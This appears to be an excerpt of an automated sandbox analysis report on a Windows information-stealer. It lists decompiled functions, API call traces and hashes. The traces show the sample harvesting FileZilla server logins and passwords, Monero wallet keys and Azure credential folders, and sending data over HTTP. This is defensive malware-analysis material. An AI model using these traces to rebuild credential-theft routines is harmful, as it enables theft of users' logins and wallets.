                              • Opcode Fuzzy Hash: b4ba13db02caf53e63d8efff6033a8893e6982749840d035e2baba7360fef18e
                              • Instruction Fuzzy Hash: 9D51E7F3F041005FF3049A2DDC8576AB7E6EBD4320F1A863DEA98D3788E9399D054296
                              Function 004053A8 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0R9{
                              • API String ID: 0-1996814445
                              • Opcode ID: 732ff30cc760373cca01c43c117a12191e6f306bd560122f3d84281183ce0dd7
                              • Instruction ID: c5ce0fd12ada907f752df5ec696f51e2e8be02a3af1c5a4442a616a90a20c1b9
                              • Opcode Fuzzy Hash: 732ff30cc760373cca01c43c117a12191e6f306bd560122f3d84281183ce0dd7
                              • Instruction Fuzzy Hash: 3A5158F3E082044BE3146E2DEC4576AB7DADFD0720F1B863E9AD487784ED35680586C6
                              Function 00139750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00130250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001299C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001299EC
                                • Part of subcall function 001299C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00129A11
                                • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                                • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                                • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                                • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                                • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00140DBA,00140DB7,00140DB6,00140DB3), ref: 00130362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00130369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00130385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001303CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 001303DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00130419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00130463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00130562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00130571
                              • lstrcat.KERNEL32(?,url: ), ref: 00130580
                              • lstrcat.KERNEL32(?,00000000), ref: 00130593
                              • lstrcat.KERNEL32(?,00141678), ref: 001305A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001305B5
                              • lstrcat.KERNEL32(?,0014167C), ref: 001305C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001305D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001305E6
                              • lstrcat.KERNEL32(?,00141688), ref: 001305F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00130604
                              • lstrcat.KERNEL32(?,00000000), ref: 00130617
                              • lstrcat.KERNEL32(?,00141698), ref: 00130626
                              • lstrcat.KERNEL32(?,0014169C), ref: 00130635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: a6358ab1c9aae06d5ff3da466fd112d1dce68b9c546b76e58d5abdf80bf1ff1d
                              • Instruction ID: f3cf749e1d42023d62365ded3be20c1742fdf4aad68565da6a49c194304666d7
                              • Opcode Fuzzy Hash: a6358ab1c9aae06d5ff3da466fd112d1dce68b9c546b76e58d5abdf80bf1ff1d
                              • Instruction Fuzzy Hash: 05D13072900208ABDB05EBF4DD96EEE777CAF28301F848458F142B7091DF75AA49DB61
                              Function 00125960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                                • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                                • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001259F8
                              • StrCmpCA.SHLWAPI(?,00FFE7D8), ref: 00125A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00125B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00FFE808,00000000,?,00FFA930,00000000,?,00141A1C), ref: 00125E71
                              • lstrlen.KERNEL32(00000000), ref: 00125E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00125E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00125E9A
                              • lstrlen.KERNEL32(00000000), ref: 00125EAF
                              • lstrlen.KERNEL32(00000000), ref: 00125ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00125EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00125F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00125F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00125F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00125FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00125FBD
                              • HttpOpenRequestA.WININET(00000000,00FFE898,?,00FFE338,00000000,00000000,00400100,00000000), ref: 00125BF8
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • InternetCloseHandle.WININET(00000000), ref: 00125FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 38bbb121b363e328d9f2d56b0697b4b62e36ac1fb8a63b3dfec11d8e3aa67f13
                              • Instruction ID: ff9e53a1e0b2273480f5959400d743e29934e991a2686417d529c0652d034235
                              • Opcode Fuzzy Hash: 38bbb121b363e328d9f2d56b0697b4b62e36ac1fb8a63b3dfec11d8e3aa67f13
                              • Instruction Fuzzy Hash: 7E12DC72860128ABDB15EBA0DCA5FEEB378BF24701F904199F14673091EF706A49CF65
                              Function 0012CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00FFA990,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0012D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0012D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D208
                              • lstrcat.KERNEL32(?,00141478), ref: 0012D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D22A
                              • lstrcat.KERNEL32(?,0014147C), ref: 0012D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D24C
                              • lstrcat.KERNEL32(?,00141480), ref: 0012D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D26E
                              • lstrcat.KERNEL32(?,00141484), ref: 0012D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D290
                              • lstrcat.KERNEL32(?,00141488), ref: 0012D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D2B2
                              • lstrcat.KERNEL32(?,0014148C), ref: 0012D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0012D2D4
                              • lstrcat.KERNEL32(?,00141490), ref: 0012D2E3
                                • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                                • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                              • lstrlen.KERNEL32(?), ref: 0012D32A
                              • lstrlen.KERNEL32(?), ref: 0012D339
                                • Part of subcall function 0013AA70: StrCmpCA.SHLWAPI(00FF9218,0012A7A7,?,0012A7A7,00FF9218), ref: 0013AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0012D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: 3a1e2fdfd8a44aa6243702b3291a2cc6ebb527c6ac72d123fbf73d8b2b4c881c
                              • Instruction ID: d01ebe2cdd5911b3690af7d493097d02abdf91301b1a676af3b697962b0fbd2d
                              • Opcode Fuzzy Hash: 3a1e2fdfd8a44aa6243702b3291a2cc6ebb527c6ac72d123fbf73d8b2b4c881c
                              • Instruction Fuzzy Hash: 77E10A72910118ABCB05EBA0DD96EEE777CBF24301F904158F146B70A1DF75AA09CFA2
                              Function 0012C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                                • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                                • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                                • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                                • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00FF90A8,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                                • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                                • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00FFD2A8,00000000,?,0014144C,00000000,?,?), ref: 0012CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0012CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0012CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0012CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0012CAD9
                              • StrStrA.SHLWAPI(?,00FFD338,00140B52), ref: 0012CAF7
                              • StrStrA.SHLWAPI(00000000,00FFD350), ref: 0012CB1E
                              • StrStrA.SHLWAPI(?,00FFD740,00000000,?,00141458,00000000,?,00000000,00000000,?,00FF91E8,00000000,?,00141454,00000000,?), ref: 0012CCA2
                              • StrStrA.SHLWAPI(00000000,00FFD960), ref: 0012CCB9
                                • Part of subcall function 0012C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                                • Part of subcall function 0012C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                              • StrStrA.SHLWAPI(?,00FFD960,00000000,?,0014145C,00000000,?,00000000,00FF9208), ref: 0012CD5A
                              • StrStrA.SHLWAPI(00000000,00FF8F58), ref: 0012CD71
                                • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                                • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                                • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                              • lstrlen.KERNEL32(00000000), ref: 0012CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0012CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 1cb01d1f31436fdc5f8660c93b3ffe31201d5e611589b9b4e18b87e53d8d5a3b
                              • Instruction ID: 46c1ef07c9bcc93dd0198b71dbffb313fafe721a4e4bb994a3f27972a63a8ce8
                              • Opcode Fuzzy Hash: 1cb01d1f31436fdc5f8660c93b3ffe31201d5e611589b9b4e18b87e53d8d5a3b
                              • Instruction Fuzzy Hash: A1E1F071D10108ABDB15EBA4DC96FEEB778AF24301F804199F14677191EF706A4ACFA2
                              Function 00138320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                              • RegOpenKeyExA.ADVAPI32(00000000,00FFB048,00000000,00020019,00000000,001405B6), ref: 001383A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                              • wsprintfA.USER32 ref: 00138459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                                • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1815930346.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                              • Associated: 00000000.00000002.1815913744.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1815930346.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000050A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.0000000000608000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000060F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816070197.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816583562.000000000061F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1816913937.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_120000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                              • Instruction ID: eee742040809c0b4afcfe97b96a7b9aa48e541a1c39b4360b6a9458f7f92d774
                              • Opcode Fuzzy Hash: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                              • Instruction Fuzzy Hash: DB810CB1910218ABEB25DB50CC95FEA77B8FF58700F4082D9F149A6140DF716B85CF95
                              Function 00134D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00134DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00134DCD
                                • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                                • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
